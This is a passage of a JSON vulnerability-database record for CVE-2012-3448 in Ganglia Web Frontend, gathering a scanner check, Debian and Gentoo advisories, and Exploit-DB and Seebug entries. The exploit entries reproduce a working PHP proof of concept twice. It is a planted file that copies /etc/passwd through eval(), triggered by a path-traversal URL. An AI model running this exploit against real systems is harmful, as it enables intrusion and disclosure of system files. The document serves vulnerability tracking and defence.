make_list(\"lt 3.3.7\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-im/gg-transport\", unaffected: make_list(\"ge 2.2.4\"), vulnerable: make_list(\"lt 2.2.4\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-10-24T22:41:43", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2610-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nJanuary 21, 2013 
http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ganglia\nVulnerability : arbitrary script execution\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-3448\nDebian Bug : 683584\n\nInsufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web browser. \n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.3.8-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.3.8-1.\n\nWe recommend that you upgrade your ganglia packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2013-01-21T20:34:09", "published": "2013-01-21T20:34:09", "id": "DEBIAN:DSA-2610-1:D545E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00014.html", "title": "[SECURITY] [DSA 2610-1] ganglia security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T07:09:04", "bulletinFamily": "exploit", "description": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution. CVE-2012-3448. 
Webapps exploit for php platform", "modified": "2015-08-31T00:00:00", "published": "2015-08-31T00:00:00", "id": "EDB-ID:38030", "href": "https://www.exploit-db.com/exploits/38030/", "type": "exploitdb", "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution", "sourceData": "<?php\r\n/*\r\n\r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n\r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n\r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n\r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attack.php\r\n\r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n\r\n5. 
Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n\r\n*/\r\n\r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38030/"}], "seebug": [{"lastseen": "2017-11-19T12:29:55", "bulletinFamily": "exploit", "description": "<p>1. Assuming that ganglia is installed on the target machine at this path:</p><p>/var/www/html/ganglia/</p><p> </p><p>2. Assuming the attacker has minimal access to the target machine and </p><p>can write to \"/tmp\". There are several methods where a remote attacker can </p><p>also trigger daemons or other system processes to create files in \"/tmp\" </p><p>whose content is (partially) controlled by the remote attacker. </p><p> </p><p>3. The attacker puts the contents of this PoC file into the file:</p><p>/tmp/attack.php</p><p> </p><p>4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 </p><p>as:</p><p><a href=\"http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\" rel=\"nofollow\">http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY</a></p><p> </p><p>5. 
Confirm that the PoC created a dummy file in the /tmp folder and copied </p><p>/etc/passwd to /tmp.</p>", "modified": "2015-09-01T00:00:00", "published": "2015-09-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89282", "id": "SSV:89282", "type": "seebug", "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution", "sourceData": "\n <?php\r\n/*\r\n \r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n \r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n \r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n \r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attack.php\r\n \r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n \r\n5. 
Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n \r\n*/\r\n \r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n \r\n?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89282", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:02", "bulletinFamily": "unix", "description": "### Background\n\nFor more information on the packages listed in this GLSA, please see their homepage referenced in the ebuild. \n\n### Description\n\nVulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details. \n\n * EGroupware\n * VTE\n * Layer Four Traceroute (LFT)\n * Suhosin\n * Slock\n * Ganglia\n * Jabber to GaduGadu Gateway\n\n### Impact\n\nA context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, cause Denial of Service, obtain sensitive information, or otherwise bypass security restrictions. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll EGroupware users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-apps/egroupware-1.8.004.20120613\"\n \n\nAll VTE 0.32 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-libs/vte-0.32.2\"\n \n\nAll VTE 0.28 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-libs/vte-0.28.2-r204\"\n \n\nAll Layer Four Traceroute users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/lft-3.33\"\n \n\nAll Suhosin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/suhosin-0.9.33\"\n \n\nAll Slock users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-misc/slock-1.0\"\n \n\nAll Ganglia users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-cluster/ganglia-3.3.7\"\n \n\nAll Jabber to GaduGadu Gateway users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/gg-transport-2.2.4\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures have been available since 2013. It is likely that your system is already no longer affected by these issues.", "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "id": "GLSA-201412-10", "href": "https://security.gentoo.org/glsa/201412-10", "type": "gentoo", "title": "Multiple packages, Multiple vulnerabilities fixed in 2012", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}